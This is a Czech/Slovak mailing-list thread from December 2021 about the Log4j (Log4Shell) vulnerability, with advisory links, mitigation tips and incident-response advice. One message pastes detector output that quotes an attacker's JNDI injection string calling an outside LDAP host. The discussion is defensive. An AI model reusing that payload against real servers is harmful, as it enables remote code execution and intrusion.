[OT] Log4j - klice od pulky internetu

konference na vojtek.biz konference na vojtek.biz
Úterý Prosinec 14 17:31:02 CET 2021 

Pokud tam nemáte něco, co sleduje komunikaci (IDS) - jako ze nejspíš, ne tak toho moc víc nezjistíte. 
Můžete projít logy a pustit si po síti nmap a zjistit co všechno máte na jednotlivých adresách otevřené a podívat se připadne dále jestli se to někam nerozezlo.
Jestli to není moc práce smažte to a dejte tam novy image je to nejbezpečnější.
Pokud už Vám to totiž ovládli pravděpodobně po sobě uklidili. Malou naději bych vkládal do toho, že to v tom logu zůstalo, ale opravdu jen malou.
J.V.


-----Original Message-----
From: Hw-list <hw-list-bounces na list.hw.cz> On Behalf Of Kaliciak, Richard
Sent: úterý 14. prosince 2021 17:18
To: hw-list na list.hw.cz
Subject: Re: [OT] Log4j - klice od pulky internetu

Dobrý deň,

tak som si na svoj RasPi naklonoval

git clone https://github.com/Neo23x0/log4shell-detector

a sviňa je tam, už 10.12., napr:
[!] FILE: /var/log/lighttpd/access.log.1 LINE_NUMBER: 373
DEOBFUSCATED_STRING: ${jndi:ldap: LINE: 139.59.8.39 188.102.218.151 -
[10/Dec/2021:20:44:42 +0100] "GET / HTTP/1.1" 200 1562 "-" 
"${jndi:ldap://a8fvkc.dnslog.cn/a}"
...
[!] 2 files with exploitation attempts detected in PATH: /var/log [!!!] 11 exploitation attempts detected in the complete scan

Sakra prace, da sa nejako zistit, co sa z tej URL stiahlo? A ci to pobezi aj na armv7?

Zatial som stopol lighttpd a zaver port 80 na routeri.
Vie mi niekto poradit, co dalej?

Richard Kaliciak


Am 13.12.2021 um 13:54 schrieb Dodo Racek:
> Ono je to takmer uplne vsade... a VEEEELmi neprijemne...
> 
> Nebezpecnost 10 z 10.
> 
> VMware
> https://blog.cloudflare.com/inside-the-log4j2-vulnerability-cve-2021-4
> 4228/ 
> <https://blog.cloudflare.com/inside-the-log4j2-vulnerability-cve-2021-
> 44228/>
> Oracle
> https://www.oracle.com/security-alerts/alert-cve-2021-44228.html
> <https://www.oracle.com/security-alerts/alert-cve-2021-44228.html>
> Zalohovania
> https://www.veritas.com/content/support/en_US/article.100052058
> <https://www.veritas.com/content/support/en_US/article.100052058>
> 
> atd...
> 
> Roboti po internete uz par dni pracuju na plne obratky...
> 
> Dodo
> 
> 
> 
> po 13. 12. 2021 o 13:25 <konference na vojtek.biz 
> <mailto:konference na vojtek.biz>> napísal(a):
> 
>     Trochu si zaspamuju, ale je to opravdu prusvih.____
> 
>     Pravdepodobne jste o tom uz  slyseli – jedna se o problem v apache
>     knihovne ktera se pouziva skoro vsude kde je java a potrebujete
>     logovat.____
> 
>     Popis problem treba tady ____
> 
>     https://www.wired.com/story/log4j-flaw-hacking-internet/
>     <https://www.wired.com/story/log4j-flaw-hacking-internet/>____
> 
>     Je potreba si uvedomit, ze je to opravdu skoro vsude a nase
>     firewally zachycuji aktivni pouzivani techto exploit. Jinak bych sem
>     nepsal. Sam jsem doma upravoval kde co pocinaje minecraftem (i
>     klient) a konce domaci automatizaci____
> 
>     Oprav existuje nekolik – dat posledni verzi  pridat java parametr
>       -Dlog4j2.formatMsgNoLookups=true pripadne se da kuchnout jarko a
>     udelat tam vymenu classy ____
> 
>     J.V.____
> 
>     _______________________________________________
>     HW-list mailing list  -  sponsored by www.HW.cz <http://www.HW.cz>
>     Hw-list na list.hw.cz <mailto:Hw-list na list.hw.cz>
>     http://list.hw.cz/mailman/listinfo/hw-list
>     <http://list.hw.cz/mailman/listinfo/hw-list>
> 
> 
> _______________________________________________
> HW-list mailing list  -  sponsored by www.HW.cz Hw-list na list.hw.cz 
> http://list.hw.cz/mailman/listinfo/hw-list
> 
_______________________________________________
HW-list mailing list  -  sponsored by www.HW.cz Hw-list na list.hw.cz http://list.hw.cz/mailman/listinfo/hw-list

Další informace o konferenci Hw-list